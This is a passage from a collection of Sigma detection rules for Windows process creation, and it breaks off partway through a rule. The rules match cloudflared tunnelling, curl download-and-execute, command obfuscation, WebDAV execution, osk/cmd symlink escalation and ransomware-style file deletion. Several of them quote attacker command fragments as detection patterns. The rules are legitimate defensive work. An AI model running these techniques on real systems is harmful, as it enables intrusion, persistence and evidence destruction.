'SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7'\n              - 'SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373'\n              - 'SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670'\n              - 'SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a'\n              - 'SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0'\n              - 'SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1'\n              - 'SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2'\n              - 'SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac'\n              - 'SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f'\n              - 'SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d'\n              - 'SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499'\n              - 'SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b'\n              - 'SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f'\n              - 'SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032'\n              - 'SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234'\n              - 'SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f'\n              - 'SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058'\n              - 'SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c'\n              - 'SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f'\n              - 'SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5'\n              - 'SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3'\n              - 'SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4'\n              - 'SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c'\n              - 'SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4'\n              - 'SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f'\n              - 'SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad'\n              - 'SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7'\n              - 'SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75'\n              - 'SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6'\n              - 'SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688'\n              - 'SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f'\n              - 'SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663'\n              - 'SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77'\n              - 'SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078'\n    # Note:\n    #   Accounts for the cloudflared binaries being renamed\n    #   `tunnel` is optional, but has been included to reduce the possibility of parameter collision when not observed with known binary names\n    selection_param:\n        - CommandLine|contains|all:\n              - '-url'\n              - 'tunnel'\n        - CommandLine|contains:\n              - '.exe -url'\n              - '.exe --url'\n    selection_other:\n        CommandLine|contains|all:\n            - '-url'\n            - '-no-autoupdate'\n    condition: (selection_img and selection_param) or selection_other\nfalsepositives:\n    - Legitimate usage of Cloudflare Quick Tunnel\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml",
    "content": "title: Cloudflared Tunnel Connections Cleanup\nid: 7050bba1-1aed-454e-8f73-3f46f09ce56a\nstatus: test\ndescription: Detects execution of the \"cloudflared\" tool with the tunnel \"cleanup\" flag in order to cleanup tunnel connections.\nreferences:\n    - https://github.com/cloudflare/cloudflared\n    - https://developers.cloudflare.com/cloudflare-one/connections/connect-apps\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-17\nmodified: 2023-12-21\ntags:\n    - attack.command-and-control\n    - attack.t1102\n    - attack.t1090\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' tunnel '\n            - 'cleanup '\n        CommandLine|contains:\n            - '-config '\n            - '-connector-id '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of Cloudflared.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml",
    "content": "title: Cloudflared Tunnel Execution\nid: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4\nstatus: test\ndescription: Detects execution of the \"cloudflared\" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.\nreferences:\n    - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group\n    - https://github.com/cloudflare/cloudflared\n    - https://developers.cloudflare.com/cloudflare-one/connections/connect-apps\nauthor: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-17\nmodified: 2023-12-20\ntags:\n    - attack.command-and-control\n    - attack.t1102\n    - attack.t1090\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' tunnel '\n            - ' run '\n        CommandLine|contains:\n            - '-config '\n            - '-credentials-contents '\n            - '-credentials-file '\n            - '-token '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of Cloudflared tunnel.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml",
    "content": "title: Change Default File Association Via Assoc\nid: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061\nrelated:\n    - id: ae6f14e6-14de-45b0-9f44-c0986f50dc89\n      type: similar\nstatus: test\ndescription: |\n    Detects file association changes using the builtin \"assoc\" command.\n    When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-03-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains: 'assoc'\n    condition: all of selection_*\nfalsepositives:\n    - Admin activity\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml",
    "content": "title: Change Default File Association To Executable Via Assoc\nid: ae6f14e6-14de-45b0-9f44-c0986f50dc89\nrelated:\n    - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061\n      type: derived\nstatus: test\ndescription: |\n    Detects when a program changes the default file association of any extension to an executable.\n    When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2023-03-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'assoc '\n            - 'exefile'\n    filter:\n        CommandLine|contains: '.exe=exefile'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml",
    "content": "title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE\nid: 044ba588-dff4-4918-9808-3f95e8160606\nstatus: test\ndescription: Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share\nreferences:\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-27\nmodified: 2023-09-12\ntags:\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: copy \\\\<host>\\\\<folder>\\\\process.dmp C:\\Users\\process.dmp\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'copy '\n            - ' \\\\\\\\'\n        CommandLine|contains:\n            - '.dmp'\n            - '.dump'\n            - '.hdmp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml",
    "content": "title: Curl Download And Execute Combination\nid: 21dd6d38-2b18-4453-9404-a0fe4a0cc288\nstatus: test\ndescription: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.\nreferences:\n    - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link\nauthor: Sreeman, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-01-13\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|windash: ' -c '\n        CommandLine|contains|all:\n            - 'curl '\n            - 'http'\n            - '-o'\n            - '&'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_del_execution.yml",
    "content": "title: File Deletion Via Del\nid: 379fa130-190e-4c3f-b7bc-6c8e834485f3\nstatus: test\ndescription: |\n    Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\n    Adversaries may delete files left behind by the actions of their intrusion activity.\n    Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\n    Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase\nauthor: frack113\ndate: 2022-01-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_del:\n        CommandLine|contains:\n            - 'del '\n            - 'erase '\n    selection_flags:\n        CommandLine|contains|windash:\n            - ' -f' # Force deleting of read-only files.\n            - ' -s' # Delete specified files from all subdirectories.\n            - ' -q' # Quiet mode, do not ask if ok to delete on global wildcard\n    condition: all of selection_*\nfalsepositives:\n    - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml",
    "content": "title: Greedy File Deletion Using Del\nid: 204b17ae-4007-471b-917b-b917b315c5db\nstatus: test\ndescription: Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.\nreferences:\n    - https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase\nauthor: frack113 , X__Junior (Nextron Systems)\ndate: 2021-12-02\nmodified: 2023-09-11\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example:\n    #   del C:\\ProgramData\\*.dll & exit\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_del:\n        CommandLine|contains:\n            - 'del '\n            - 'erase '\n    selection_extensions:\n        CommandLine|contains:\n            - '\\\\\\*.au3'\n            - '\\\\\\*.dll'\n            - '\\\\\\*.exe'\n            - '\\\\\\*.js'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml",
    "content": "title: File And SubFolder Enumeration Via Dir Command\nid: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006\nstatus: test\ndescription: |\n    Detects usage of the \"dir\" command part of Windows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md\nauthor: frack113\ndate: 2021-12-13\nmodified: 2024-04-14\ntags:\n    - attack.discovery\n    - attack.t1217\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: Cmd.Exe\n    selection_cli:\n        CommandLine|contains|windash: 'dir*-s'\n    condition: all of selection_*\nfalsepositives:\n    - Likely\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: List Internet Explorer Bookmarks using the command prompt\n      technique: T1217\n      atomic_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml",
    "content": "title: Potential Dosfuscation Activity\nid: a77c1610-fc73-4019-8e29-0f51efc04a51\nstatus: test\ndescription: Detects possible payload obfuscation via the commandline\nreferences:\n    - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf\n    - https://github.com/danielbohannon/Invoke-DOSfuscation\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-15\nmodified: 2023-03-06\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '^^'\n            - '^|^'\n            - ',;,'\n            - ';;;;'\n            - ';; ;;'\n            - '(,(,'\n            - '%COMSPEC:~'\n            - ' c^m^d'\n            - '^c^m^d'\n            - ' c^md'\n            - ' cm^d'\n            - '^cm^d'\n            - ' s^et '\n            - ' s^e^t '\n            - ' se^t '\n            # - '%%'\n            # - '&&'\n            # - '\"\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml",
    "content": "title: Command Line Execution with Suspicious URL and AppData Strings\nid: 1ac8666b-046f-4201-8aba-1951aaec03a3\nstatus: test\ndescription: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)\nreferences:\n    - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100\n    - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2019-01-16\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.command-and-control\n    - attack.t1059.003\n    - attack.t1059.001\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - 'http' # captures both http and https\n            - '://'\n            - '%AppData%'\n    condition: selection\nfalsepositives:\n    - High\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag.yml",
    "content": "title: Cmd Launched with Hidden Start Flags to Suspicious Targets\nid: 5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d\nstatus: experimental\ndescription: |\n    Detects cmd.exe executing commands with the \"start\" utility using \"/b\" (no window) or \"/min\" (minimized) flags.\n    To reduce false positives from standard background tasks, detection is restricted to scenarios where the target is a known script extension or located in suspicious temporary/public directories.\n    This technique was observed in Chaos, DarkSide, and Emotet malware campaigns.\nreferences:\n    - https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous\n    - https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\n    - https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/start\ntags:\n    - attack.defense-evasion\n    - attack.t1564.003\nauthor: Vladan Sekulic, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-24\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cmd_hidden_start_1:\n        CommandLine|contains|windash:\n            - 'start '\n            - 'start/b'\n            - 'start/min'\n    selection_cmd_hidden_start_2:\n        CommandLine|contains|windash:\n            - '/b '\n            - '/b\"'\n            - '/min '\n            - '/min\"'\n    selection_cli_uncommon_location:\n        CommandLine|contains:\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Contacts\\'\n            - '\\Documents\\'\n            - '\\Downloads\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\inetpub\\'\n            - '\\Music\\'\n            - '\\Photos\\'\n            - '\\Temporary Internet\\'\n            - '\\Users\\Public\\'\n            - '\\Videos\\'\n    selection_cli_susp_extension:\n        CommandLine|contains:\n            - '.bat'\n            - '.cmd'\n            - '.cpl'\n            - '.hta'\n            - '.js'\n            - '.ps1'\n            - '.scr'\n            - '.vbe'\n            - '.vbs'\n    selection_cli_susp_pattern:\n        CommandLine|contains:\n            - ' -nop '\n            - ' -sta '\n            - '.downloadfile(' # PowerShell download command\n            - '.downloadstring(' # PowerShell download command\n            - '-noni '\n            - '-w hidden '\n    condition: all of selection_cmd_* and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate administrative scripts running from temporary folders.\n    - Niche software updaters utilizing hidden batch files in ProgramData.\nlevel: medium # Can be increased after an initial baseline and tuning\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_launched_with_hidden_start_flag/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml",
    "content": "title: Potential Privilege Escalation Using Symlink Between Osk and Cmd\nid: e9b61244-893f-427c-b287-3e708f321c6b\nstatus: test\ndescription: Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md\n    - https://ss64.com/nt/mklink.html\nauthor: frack113\ndate: 2022-12-11\nmodified: 2022-12-20\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.008\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'mklink'\n            - '\\osk.exe'\n            - '\\cmd.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml",
    "content": "title: VolumeShadowCopy Symlink Creation Via Mklink\nid: 40b19fa6-d835-400c-b301-41f3a2baacaf\nstatus: stable\ndescription: Shadow Copies storage symbolic link creation using operating systems utilities\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-10-22\nmodified: 2023-03-06\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'mklink'\n            - 'HarddiskVolumeShadowCopy'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator working with shadow copies, access for backup purposes\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml",
    "content": "title: Suspicious File Execution From Internet Hosted WebDav Share\nid: f0507c0f-a3a2-40f5-acc6-7f543c334993\nstatus: test\ndescription: Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files\nreferences:\n    - https://twitter.com/ShadowChasing1/status/1552595370961944576\n    - https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior\nauthor: pH-T (Nextron Systems)\ndate: 2022-09-01\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.EXE'\n    selection_base:\n        CommandLine|contains|all:\n            - ' net use http'\n            - '& start /b '\n            - '\\DavWWWRoot\\'\n    selection_ext:\n        CommandLine|contains:\n            - '.exe '\n            - '.dll '\n            - '.bat '\n            - '.vbs '\n            - '.ps1 '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml",
    "content": "title: Cmd.EXE Missing Space Characters Execution Anomaly\nid: a16980c2-0c56-4de0-9a79-17971979efdd\nstatus: test\ndescription: |\n    Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\n    This could be a sign of obfuscation of a fat finger problem (typo by the developer).\nreferences:\n    - https://twitter.com/cyb3rops/status/1562072617552678912\n    - https://ss64.com/nt/cmd.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-23\nmodified: 2023-03-06\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:  # missing space before the /c\n        CommandLine|contains:\n            - 'cmd.exe/c'\n            - '\\cmd/c'  # just cmd/c would be prone to false positives\n            - '\"cmd/c'\n            - 'cmd.exe/k'\n            - '\\cmd/k'  # just cmd/k would be prone to false positives\n            - '\"cmd/k'\n            - 'cmd.exe/r'\n            - '\\cmd/r'  # just cmd/r would be prone to false positives\n            - '\"cmd/r'\n    selection2: # special cases verified via Virustotal Enterprise search\n        CommandLine|contains:\n            - '/cwhoami'\n            - '/cpowershell'\n            - '/cschtasks'\n            - '/cbitsadmin'\n            - '/ccertutil'\n            - '/kwhoami'\n            - '/kpowershell'\n            - '/kschtasks'\n            - '/kbitsadmin'\n            - '/kcertutil'\n    selection3:  # missing space after the /c\n        CommandLine|contains:\n            - 'cmd.exe /c'\n            - 'cmd /c'\n            - 'cmd.exe /k'\n            - 'cmd /k'\n            - 'cmd.exe /r'\n            - 'cmd /r'\n    filter_generic:\n        CommandLine|contains:\n            - 'cmd.exe /c '\n            - 'cmd /c '\n            - 'cmd.exe /k '\n            - 'cmd /k '\n            - 'cmd.exe /r '\n            - 'cmd /r '\n    filter_fp:\n        - CommandLine|contains: 'AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules'\n        - CommandLine|endswith: 'cmd.exe/c .'\n        - CommandLine: 'cmd.exe /c'\n    condition: 1 of selection* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml",
    "content": "title: NtdllPipe Like Activity Execution\nid: bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2\nstatus: test\ndescription: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe\nreferences:\n    - https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-05\nmodified: 2023-03-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'type %windir%\\system32\\ntdll.dll'\n            - 'type %systemroot%\\system32\\ntdll.dll'\n            - 'type c:\\windows\\system32\\ntdll.dll'\n            - '\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_path_traversal.yml",
    "content": "title: Potential CommandLine Path Traversal Via Cmd.EXE\nid: 087790e3-3287-436c-bccf-cbd0184a7db1\nstatus: test\ndescription: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking\nreferences:\n    - https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/\n    - https://twitter.com/Oddvarmoe/status/1270633613449723905\nauthor: xknow @xknow_infosec, Tim Shelton\ndate: 2020-06-11\nmodified: 2023-03-06\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - ParentImage|endswith: '\\cmd.exe'\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'cmd.exe'\n    selection_flags:\n        - ParentCommandLine|contains:\n              - '/c'\n              - '/k'\n              - '/r'\n        - CommandLine|contains:\n              - '/c'\n              - '/k'\n              - '/r'\n    selection_path_traversal:\n        - ParentCommandLine: '/../../'\n        - CommandLine|contains: '/../../'\n    filter_java:\n        CommandLine|contains: '\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Java tools are known to produce false-positive when loading libraries\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml",
    "content": "title: Potentially Suspicious Ping/Copy Command Combination\nid: ded2b07a-d12f-4284-9b76-653e37b6c8b0\nstatus: test\ndescription: |\n    Detects uncommon and potentially suspicious one-liner command containing both \"ping\" and \"copy\" at the same time, which is usually used by malware.\nreferences:\n    - Internal Research\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-18\nmodified: 2024-03-06\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277\n    selection_cmd:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_action:\n        CommandLine|contains|all:\n            - 'ping' # Covers \"ping\" and \"ping.exe\"\n            - 'copy '\n    selection_cli_1:\n        CommandLine|contains|windash: ' -n ' # Count\n    selection_cli_2:\n        CommandLine|contains|windash: ' -y '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml",
    "content": "title: Suspicious Ping/Del Command Combination\nid: 54786ddc-5b8a-11ed-9b6a-0242ac120002\nstatus: test\ndescription: Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example\nreferences:\n    - https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack\n    - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf\n    - https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware\nauthor: Ilya Krestinichev\ndate: 2022-11-03\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277\n    # Example: \"C:\\Windows\\System32\\cmd.exe\"  /C 